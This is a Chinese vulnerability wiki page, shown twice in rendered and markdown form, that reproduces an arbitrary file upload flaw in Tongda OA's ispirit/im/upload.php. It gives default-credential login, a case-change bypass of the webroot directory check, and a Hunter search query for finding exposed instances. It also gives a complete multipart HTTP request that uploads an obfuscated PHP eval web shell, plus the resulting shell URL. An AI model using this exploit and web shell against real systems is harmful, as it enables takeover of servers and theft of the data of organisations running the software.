fofamini-wiki

登录白背景

源码

通达OA ispirit存在后台任意文件上传漏洞

一、漏洞简介

通达OA是由北京通达信科科技有限公司自主研发的协同办公自动化系统，包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等，ispirit/im/upload.php文件存在任意文件上传，用户可以通过上传任意文件到服务器中，并且可以借助上传的文件利用shell工具直接获得system权限。

二、影响版本

通达OA 2017-通达OA V 11.4

三、资产测绘

hunterapp.name="通达 OA"

登录页面

四、漏洞复现

1、使用默认密码admin，密码为空或采用通达OA任意用户登录登录后台；

2、点击系统管理->系统参数设置->OA服务设置，找到网站根目录：D:MYOAwebroot；

3、点击系统管理->附件管理->添加存储目录，设置附件上传目录为网站根目录：
存储目录设置为Webroot目录，标识id为100-255的整数，勾选将所有新附件存至该目录，描述随意：
⚠️注意：在11.2以上版本会检测存储目录是否包含webroot关键词检测，所以采用大小写绕过：D:MYOAwebrooT；

4、上传文件
其中P为登陆后的cookie中的PHPSESSID字段
数据包：

POST /ispirit/im/upload.php HTTP/1.1
Host: 192.168.31.164
Content-Length: 639
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5
Connection: close

------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="UPLOAD_MODE"

1
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="P"

l2h5pe5n9hmhrmqi2nj89lae50
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="DEST_UID"

1
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="ATTACHMENT"; filename="shell.php."
Content-Type: image/jpeg

<?php class GB7W5S8T { public function __construct($H7U41){ @eval("/*Zc98EhVx4t*/".$H7U41."/*Zc98EhVx4t*/"); }}new GB7W5S8T($_REQUEST['x']);?>
------WebKitFormBoundarypyfBh1YB4pV8McGB--

5、上传文件地址：
http://192.168.31.154/im/2307/745750878.shell.php

原文: https://www.yuque.com/xiaokp7/ocvun2/idtdchg29ap4zdag

# 通达OA ispirit存在后台任意文件上传漏洞

# 一、漏洞简介
通达OA是由北京通达信科科技有限公司自主研发的协同办公自动化系统，包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等，ispirit/im/upload.php文件存在任意文件上传，用户可以通过上传任意文件到服务器中，并且可以借助上传的文件利用shell工具直接获得system权限。

# 二、影响版本

- 通达OA 2017-通达OA V 11.4

# 三、资产测绘

- hunter`app.name="通达 OA"`

![image.png](./img/wcLVt-YSwifAjeTX/1692175272185-2e2eccad-00b6-4598-a978-54d5b591d45a-241393.png)

- 登录页面

![image.png](./img/wcLVt-YSwifAjeTX/1692175288340-990aa042-3b09-4cd8-8ae2-c55104f1b974-564548.png)

# 四、漏洞复现
1、使用默认密码admin，密码为空或采用通达OA任意用户登录登录后台；
![image.png](./img/wcLVt-YSwifAjeTX/1683387160692-68b96b0e-ece1-4182-9c8c-3547689af283-790239.png)
2、点击系统管理->系统参数设置->OA服务设置，找到网站根目录：D:\MYOA\webroot；
![image.png](./img/wcLVt-YSwifAjeTX/1683387181275-5e4abbe8-17fc-4221-aefc-413b0bf2195c-205737.png)
3、点击系统管理->附件管理->添加存储目录，设置附件上传目录为网站根目录：
存储目录设置为Webroot目录，标识id为100-255的整数，勾选将所有新附件存至该目录，描述随意：
⚠️注意：在11.2以上版本会检测存储目录是否包含webroot关键词检测，所以采用大小写绕过：D:\MYOA\webrooT；
![image.png](./img/wcLVt-YSwifAjeTX/1683387208135-6781d1bf-4da4-4c25-9fbd-d40ae7f1a4fe-993290.png)
![image.png](./img/wcLVt-YSwifAjeTX/1683387212651-70137fc5-d07d-4d2a-b9c6-12fa5392cf40-704586.png)
4、 上传文件
其中`P`为登陆后的cookie中的`PHPSESSID`字段
**数据包：**
```
POST /ispirit/im/upload.php HTTP/1.1
Host: 192.168.31.164
Content-Length: 639
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5
Connection: close

------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="UPLOAD_MODE"

1
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="P"

l2h5pe5n9hmhrmqi2nj89lae50
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="DEST_UID"

1
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="ATTACHMENT"; filename="shell.php."
Content-Type: image/jpeg

<?php class GB7W5S8T { public function __construct($H7U41){ @eval("/*Zc98EhVx4t*/".$H7U41."/*Zc98EhVx4t*/"); }}new GB7W5S8T($_REQUEST['x']);?>
------WebKitFormBoundarypyfBh1YB4pV8McGB--
```
![image.png](./img/wcLVt-YSwifAjeTX/1690728165879-349ed2ea-b563-4806-8831-f795261c9f94-611396.png)
5、 上传文件地址：
`http://192.168.31.154/im/2307/745750878.shell.php`
![image.png](./img/wcLVt-YSwifAjeTX/1690728284269-b46b34b7-7936-41a1-80d0-1a4d4a620d49-325406.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/idtdchg29ap4zdag>